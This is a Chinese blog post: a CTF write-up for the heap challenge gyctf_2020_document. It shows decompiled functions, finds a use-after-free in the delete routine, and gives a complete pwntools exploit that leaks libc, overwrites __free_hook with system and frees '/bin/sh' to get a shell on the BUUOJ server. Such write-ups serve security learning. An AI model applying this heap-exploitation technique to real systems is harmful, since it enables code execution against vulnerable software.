gyctf_2020_document

最新推荐文章于 2024-07-12 19:48:55 发布
最新推荐文章于 2024-07-12 19:48:55 发布
阅读量65 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132598974
版权

gyctf_2020_document

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

64位,保护全开

unsigned __int64 ADD()
{
  int i; // [rsp+Ch] [rbp-24h]
  _QWORD *v2; // [rsp+10h] [rbp-20h]
  char *v3; // [rsp+18h] [rbp-18h]
  __int64 s; // [rsp+20h] [rbp-10h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0; i < 7; ++i )
  {
    if ( !BSSPTR[i] )
    {
      v2 = malloc(8uLL);
      v3 = (char *)malloc(0x80uLL);
      if ( !v2 || !v3 )
      {
        puts("Error occured!!!");
        exit(2);
      }
      puts("add success");
      *v2 = v3;
      v2[1] = 1LL;
      puts("input name");
      memset(&s, 0, sizeof(s));
      sub_AA0((char *)&s, 8u);
      *(_QWORD *)v3 = s;
      puts("input sex");
      memset(&s, 0, sizeof(s));
      sub_AA0((char *)&s, 1u);
      puts("here");
      if ( (_BYTE)s == aW[0] )
      {
        *((_QWORD *)v3 + 1) = 1LL;
      }
      else
      {
        puts("there");
        *((_QWORD *)v3 + 1) = 16LL;
      }
      puts("input information");
      sub_AA0(v3 + 16, 112u);
      BSSPTR[i] = v2;
      puts("Success");
      break;
    }
  }
  if ( i == 7 )
    puts("Th3 1ist is fu11");
  return __readfsqword(0x28u) ^ v5;
}

一共申请了两个堆,并且两个堆都无法自定义size

并且一号堆放有二号堆内容的指针

有个readsub_AA0((char *)&s, 8u)

这个的意思就是第二个参数需要8个字符,具体如下

__int64 __fastcall sub_AA0(char *a1, unsigned int a2)
{
  char *v3; // rax
  signed int v4; // [rsp+1Ch] [rbp-14h]
  unsigned int v5; // [rsp+20h] [rbp-10h]
  int v6; // [rsp+24h] [rbp-Ch]

  v4 = 0;
  v5 = 0;
  if ( a2 >= 0x81 )
    return 0LL;
  while ( v4 < (int)a2 )
  {
    v3 = a1++;
    v6 = read(0, v3, 1uLL);
    if ( !v6 )
      exit(0);
    v5 += v6;
    ++v4;
  }
  return v5;
}

unsigned __int64 sub_D86()
{
  unsigned int v1; // [rsp+Ch] [rbp-14h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Give me your index : ");
  read(0, buf, 8uLL);
  v1 = atoi(buf);
  if ( v1 >= 7 )
  {
    puts("Out of list");
  }
  else if ( *((_QWORD *)&BSSPTR + v1) )
  {
    sub_B23(**((_QWORD **)&BSSPTR + v1));
  }
  else
  {
    puts("invalid");
  }
  return __readfsqword(0x28u) ^ v3;
}

show这里就是通过一号堆存放的指针,然后write出来内容

这里可以用指针泄露libc

unsigned __int64 DELE()
{
  unsigned int v1; // [rsp+Ch] [rbp-24h]
  char buf[8]; // [rsp+20h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Give me your index : ");
  read(0, buf, 8uLL);
  v1 = atoi(buf);
  if ( v1 >= 7 )
  {
    puts("Out of list");
  }
  else if ( *((_QWORD *)&BSSPTR + v1) )
  {
    free(**((void ***)&BSSPTR + v1));
  }
  else
  {
    puts("invalid");
  }
  return __readfsqword(0x28u) ^ v3;
}

uaf

unsigned __int64 EDIT()
{
  unsigned int v1; // [rsp+8h] [rbp-28h]
  __int64 v2; // [rsp+10h] [rbp-20h]
  _BYTE *v3; // [rsp+18h] [rbp-18h]
  char buf[8]; // [rsp+20h] [rbp-10h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  puts("Give me your index : ");
  read(0, buf, 8uLL);
  v1 = atoi(buf);
  if ( v1 >= 7 )
  {
    puts("Out of list");
  }
  else if ( BSSPTR[v1] )
  {
    v2 = BSSPTR[v1];
    if ( *(_QWORD *)(v2 + 8) )
    {
      puts("Are you sure change sex?");
      read(0, buf, 8uLL);
      if ( buf[0] == aY[0] )
      {
        puts("3");
        v3 = (_BYTE *)(*(_QWORD *)BSSPTR[v1] + 8LL);
        if ( *v3 == unk_13DE )
        {
          puts(&a124[2]);
          *v3 = 1;
        }
        else
        {
          puts(a124);
          *v3 = 0x10;
        }
      }
      else
      {
        puts(&a124[4]);
      }
      puts("Now change information");
      if ( !(unsigned int)sub_AA0((char *)(*(_QWORD *)BSSPTR[v1] + 16LL), 0x70u) )
        puts("nothing");
      *(_QWORD *)(v2 + 8) = 0LL;
    }
    else
    {
      puts("you can onyly change your letter once.");
    }
  }
  else
  {
    puts("invalid");
  }
  return __readfsqword(0x28u) ^ v5;
}

edit这里注意一下

就是他修改内容的时候是sub_AA0((char *)(*(_QWORD *)BSSPTR[v1] + 16LL), 0x70u)

意思就是从内容的0x10开始修改,然后需要填满0x70的内容,这里就是为什么下面有3号堆的存在

思路

因为申请的是0x80大小的chunk,并且write的是chunk1的指针,也存在uaf,所以我们free掉之后

也能直接show出来libc,

然后通过修改free掉的unsortedbin,切割申请的一号堆,修改里面的指针使其指向free_hook

然后修改free_hook–> system 再free掉/bin/sh getshell

from pwn import*
from Yapack import *
libc=ELF('./libc-2.23.so')   

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",26265,"./pwn",0)

add(b'/bin/sh\x00',b'0',b'c'*0x70)
add(b'/bin/sh\x00',b'1',b'c'*0x70)
dele(0)
show(0)
#add(b'aaaaaaaa',b'b',b'c'*0x70)
leak=get_addr_u64()-88-0x10-libc.sym['__malloc_hook']
free=freehook(leak)
sys=system(leak)
li(leak)

add(b'/bin/sh\x00',b'2',b'c'*0x70)
add(b'yamemres',b'3',b'c'*0x70)
pl=flat(0,0x21,free-0x10,1,0,0x51,b'\x00'*0x40)
#这里为什么要-0x10,因为修改是从0x10之后才能修改,所以抬高0x10就正好修改
edit(0,b'0',pl)
edit(3,b'0',p64(sys)+b'\x00'*0x69)
li(sys)
#debug()
dele(1)

ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 881
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 398
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 990
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin,我们show,就能泄露libc 2.我们接下来的目的是控制申请
[BUUCTF]PWN——gyctf_2020_document(UAF)
mcmuyanga的博客
03-22 726
gyctf_2020_document 例行检查,64位程序,保护全开 漏洞在free chunk的时候 简单看一下其他几个功能函数 add() 像我这样的新手,可以申请几个chunk看一下,方便理清楚堆的内部情况 show(),根据存放在bss段的0x202060堆指针数组来输出对应的chunk里的值 edit() 利用思路 申请一个chunk,释放掉,在show,由于存在uaf,这样就泄露了libc 泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chun
gyctf_2020_document【buu刷题】
m0_73756460的博客
07-04 48
gyctf_2020_document【buu刷题】
[GYCTF2020]Ez_Express
qq_45691294的博客
10-27 1591
打开题目,看到登录注册的表单,在右边看到提示,需要使用ADMIN用户名登录 先注册一个号,然后登录进去,只有一个空白的页面,习惯性的查看页面源代码,发现在注释有www.zip,存在备份文件,下载文件得到源码 关键源码在app.js和index.js,直接开始代码审计吧 /route/index.js用了merge()和clone(),必是原型链的问题了 原型链概念 在 Javascript,每一个实例对象都有一个prototype属性,prototype 属性 可以向对象添加属性和方法。 objec
BUUCTF pwn wp 126 - 130
fa1c4的blog
03-31 1695
gyctf_2020_document ciscn_2019_final_5 roarctf_2019_realloc_magic houseoforange_hitcon_2016 SWPUCTF_2019_login
【web-ctfctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1944
ctf_BUUCTF_web
新春战疫公益赛(二)pwn
doudoudedi
02-23 809
第一天和第三天直接被爆锤 自己已经尽力了 武汉加油!!! borrowstack 就是基本的栈迁移 exp: from pwn import * from LibcSearcher import * #p=process('./borrowstack') p=remote('123.56.85.29',3635) elf=ELF('./borrowstack') libc=elf.libc bss...
EDEM_2020_help document.rar
03-19
EDEM_2020_help_document.rar 是一个包含EDEM 2020版本帮助文档的压缩包,为用户提供详细的软件使用指南、功能介绍和技术支持。这个压缩包可能包含了各种手册、教程、API参考、用户案例等内容,帮助用户理解和应用...
TSP.rar_tsp document
09-24
Document about traveling salesmen problem
XML_Document.rar_xml_xml_Document
09-19
XML文档(XML Document)是XML语法规范下的一种文件格式,它以纯文本方式存储结构化数据。本教程主要围绕XML_Document对象模型展开,帮助用户深入理解和使用XML文档在编程的各种操作。 XML_Document对象是许多...
ERP_Document
01-11
ERP_Document
documeina_document_
10-03
文档名“documeina_document_”可能是指一个包含多种文件的文档集合,但根据描述,“this is document is vacio not ope not download”,这似乎在表明这个文档是空的,无法打开或者没有可供下载的内容。这可能是...
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 268
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
2301_79955948的博客
07-12 548
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 966
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
安全防御-用户认证综合实验
最新发布
weixin_69863399的博客
07-12 191
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
DOCUMENT_TAX_BSET
07-27
引用\[1\]:在引用提到了一个名为"DOCUMENT_TAX_BSET"的问题,但是没有提供具体的信息。请提供更多关于"DOCUMENT_TAX_BSET"的上下文或者具体问题,以便我能够为您提供更准确的答案。 #### 引用[.reference_title] -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值